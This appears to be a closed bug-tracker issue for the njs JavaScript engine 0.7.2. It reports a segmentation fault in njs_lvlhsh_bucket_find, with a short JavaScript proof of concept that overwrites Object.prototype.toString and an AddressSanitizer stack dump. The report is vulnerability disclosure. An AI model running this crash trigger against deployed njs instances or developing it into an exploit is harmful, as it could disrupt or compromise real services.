Closed
Description
opened on Feb 15, 2022
Environment
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build :
# AddressSanitizer build with frame pointers kept, so the stack dump below is symbolised
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
Proof of concept
// Replace Object.prototype.toString with a setter-like function: when the
// engine calls it during ToPrimitive it passes no arguments, so v is
// undefined and Object.prototype.toString is overwritten with undefined.
function f2(v) {
    Object.prototype.toString = v;
}
Object.prototype.toString = f2;
function f() {
    // The property key {} must be converted to a string, which invokes f2.
    // The resulting lookup yields undefined and calling it throws a TypeError.
    "includes"[{}]();
}
// Running f as a Promise executor turns the TypeError into a rejection
// instead of aborting the script, so the next statement still executes.
new Promise(f);
// parseInt is converted to a number via ToPrimitive; the property lookup
// performed there is where ASan reports the SEGV (see stack dump).
String.fromCharCode(0,parseInt);
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
#1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
#2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
#3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
#4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
#5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
#6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
#7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
#8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
#10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
#12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
#13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
#14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
#15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING
Credit
Q1IQ(@Q1IQ)